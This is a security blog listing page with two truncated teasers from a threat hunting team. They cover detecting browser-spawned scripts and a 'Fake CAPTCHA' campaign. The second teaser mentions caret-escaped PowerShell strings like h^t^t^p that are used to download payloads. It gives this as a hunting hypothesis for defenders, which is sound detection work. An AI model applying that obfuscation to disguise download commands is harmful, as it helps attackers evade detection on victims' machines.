Published by The RSM Defense Threat Hunting Team Author: Justin Dolgos - Sr. Threat Hunter MITRE ATT&CK: T1204.002 · T1059 · T1218 · T1219 · T1222 ⚠ TLDR Executive Summary Our threat hunters built a custom detection that fires the moment a browser or Windows Explorer spawns a script or suspicious executable from a user-writable directory. In a recent ... READ MORE
Fake Captcha Chains – Portable Behaviors, Practical Detections, And Field Notes
Executive Summary RSM Defense’s Threat Hunting Team performed a focused investigation after reviewing recent intelligence on the “Fake CAPTCHA” campaign. Our hypothesis was: “If the actor is in the environment, we may observe escaped or obfuscated PowerShell commands (for example h^t^t^p) used to download and stage payloads.” The hunt confirmed activity that occurred over a ... READ MORE